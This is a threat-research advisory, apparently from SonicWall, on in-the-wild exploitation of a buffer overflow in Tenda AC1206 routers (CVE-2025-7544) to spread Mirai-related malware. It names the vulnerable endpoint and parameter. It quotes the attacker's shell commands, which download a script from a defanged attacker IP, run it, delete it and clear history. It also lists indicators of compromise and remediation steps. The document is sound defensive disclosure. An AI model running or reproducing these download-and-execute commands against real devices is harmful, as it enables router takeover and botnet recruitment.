CVE-2025-7544: Attackers Weaponize Tenda AC1206 Router Vulnerability to Deploy Mirai-Related Malware
CVE-2025-7544: Attackers Weaponize Tenda AC1206 Router Vulnerability to Deploy Mirai-Related Malware
Overview
The SonicWall Capture Labs threat research team has identified active exploitation attempts targeting CVE-2025-7544, a critical stack-based buffer overflow vulnerability affecting Tenda AC1206 routers running firmware version 15.03.06.23.
The vulnerability exists within the router’s MAC filtering configuration and can be triggered via the /goform/setMacFilterCfg endpoint through improper handling of the deviceList parameter. Successful exploitation can allow an attacker to execute arbitrary code on the device.
While public proof-of-concept (PoC) information has been available since disclosure, SonicWall Capture Labs threat research team has observed active exploitation attempts targeting internet-facing Tenda devices. Analysis of the observed attack chain shows threat actors leveraging the vulnerability to download and execute a malicious shell script that establishes persistence and deploys architecture-specific payloads.
The malware's behavior, including multi-architecture payload delivery, automated persistence installation, and botnet enrollment, is consistent with techniques commonly used by Mirai-derived IoT botnets.
The observed activity demonstrates that attackers have progressed beyond proof-of-concept testing and are actively weaponizing CVE-2025-7544 as an initial access vector for compromising vulnerable routers and incorporating them into broader botnet infrastructure.
CVE-2025-7544 has been assigned a CVSS v3.1 score of 8.8 (High).
| Vulnerability | CVE-2025-7544 |
| CVSS Score | 8.8 (High) |
| Vulnerability Type | Stack-Based Buffer Overflow |
| CWE | CWE-121 |
| Attack Vector | Network |
| User Interaction | None |
| Privileges Required | Low |
| Affected Product | Tenda AC1206 |
| Affected Version | Firmware 15.03.06.23 |
Technical Overview
The vulnerability resides within the formSetMacFilterCfg() function responsible for processing MAC address filtering configurations through the router’s web management interface.
The vulnerable endpoint accepts user-supplied input through the deviceList parameter:
POST /goform/setMacFilterCfg HTTP/1.1
Insufficient bounds checking allows an attacker to submit an oversized value that is copied into a stack-allocated buffer. A stack-based buffer overflow occurs when data written to a buffer exceeds the allocated memory region and begins overwriting adjacent stack structures. By overwriting saved frame pointers and return addresses, this can redirect program execution.
Because the vulnerable endpoint is accessible through the management interface, exploitation can be performed remotely against exposed devices.
Triggering the Vulnerability
The SonicWall Capture Labs threat research team has observed exploitation attempts targeting vulnerable Tenda devices.
The following request was captured by a honeypot sensor:
Stage 1: Buffer Overflow Trigger
The attack begins with a large sequence of repeated “A” characters:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
This pattern is commonly used to overwrite stack memory and reach critical control structures such as saved frame pointers and return addresses.
The excessive size of the deviceList parameter is consistent with public descriptions of CVE-2025-7544 and demonstrates an attempt to trigger the underlying stack-based buffer overflow.
Stage 2: Malware Deployment Commands
Following the overflow data, the attacker appends shell commands designed to retrieve and execute a remote payload:
chmod 777 /bin/wget;
chmod 777 /bin/curl;
wget hxxp://103[.]226[.]139[.]102/wawan.sh -O wawan.sh;
chmod 777 wawan.sh;
./wawan.sh;
rm -rf wawan.sh;
history -c
The commands perform the following actions:
| Command | Description |
| chmod 777 /bin/wget | Ensure wget is executable |
| chmod 777 /bin/curl | Ensure curl is executable |
| wget hxxp://103[.]226[.]139[.]102/wawan.sh | Download attacker payload |
| chmod 777 wawan.sh | Make payload executable |
| ./wawan.sh | Execute downloaded malware |
| rm -rf wawan.sh | Remove evidence |
| history -c | Clear command history |
The sequence indicates an automated infection workflow intended to compromise the router and deploy additional malware components.
Infection Chain
The observed attack follows a common IoT malware deployment process:
Unlike traditional proof-of-concept exploits that simply demonstrate a crash condition, the observed activity shows clear post-exploitation objectives focused on establishing persistent malware execution.
Malware Analysis
The attack infrastructure hosts a shell script named:
wawan.sh
The script is downloaded from:
hxxp://103[.]226[.]139[.]102/wawan.sh
Threat actors frequently use shell scripts as lightweight first-stage loaders because they can quickly determine device architecture and then download architecture-specific malware binaries.
Analysis of the downloaded payload revealed the following malware sample:
| Artifact | Value |
| SHA256 | e62e1444fe68b124875a7cdc86cbfc1aefb06c128b6b48e27d0c45f24403d6fc |
VirusTotal analysis shows that multiple security vendors classify the sample as malicious and associate it with Linux malware and the Mirai botnet. Its relationship analysis further indicates that the loader retrieves additional payloads from:
hxxp://103[.]226[.]139[.]102/terrabot/
Observed payloads include architecture-specific binaries targeting ARM, MIPS, PowerPC, SPARC, and x86-based systems. The use of dedicated malware-hosting infrastructure and multi-architecture payloads suggests a mature and automated botnet deployment operation.
SonicWall Protections
To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:
| Signature ID | Signature Name |
|---|---|
| IPS 21995 | Tenda AC1206 Buffer Overflow |
| GAV | Mirai |
| GAV | Dropper.TRB |
Potential Impact
Successful exploitation of CVE-2025-7544 could allow attackers to:
- Execute arbitrary code on vulnerable routers.
- Deploy malware and botnet payloads.
- Establish persistent access to compromised devices.
- Use infected routers as command-and-control relays.
- Launch distributed denial-of-service (DDoS) attacks.
- Pivot into internal network environments.
Because routers frequently occupy trusted positions within enterprise and home networks, successful compromise can provide attackers with valuable network visibility and additional attack opportunities.
Indicators of Compromise
- e62e1444fe68b124875a7cdc86cbfc1aefb06c128b6b48e27d0c45f24403d6fc
- 103[.]226[.]139[.]102 103.226.139.102
- 140[.]233[.]190[.]47
- terrabot[.]qzz[.]io
Remediation Recommendations
Organizations using Tenda AC1206 devices should:
- Upgrade to the latest vendor-provided firmware.
- Disable remote administration where possible.
- Restrict management interface access to trusted networks.
- Monitor for requests targeting /goform/setMacFilterCfg.
- Block communication with known malicious infrastructure.
- Continuously monitor edge devices for signs of compromise.
Organizations should assume internet-exposed vulnerable devices are at elevated risk due to the availability of public exploit information and observed in-the-wild exploitation activity.
Relevant Links
- CVE Program CVE-2025-7544
- National Vulnerability Database (NVD) CVE-2025-7544.
- VirusTotal detection for SHA256: e62e1444fe68b124875a7cdc86cbfc1aefb06c128b6b48e27d0c45f24403d6fc
- PoC
Share This Article
An Article By
An Article By
Ashwini Bhagwat
Ashwini Bhagwat
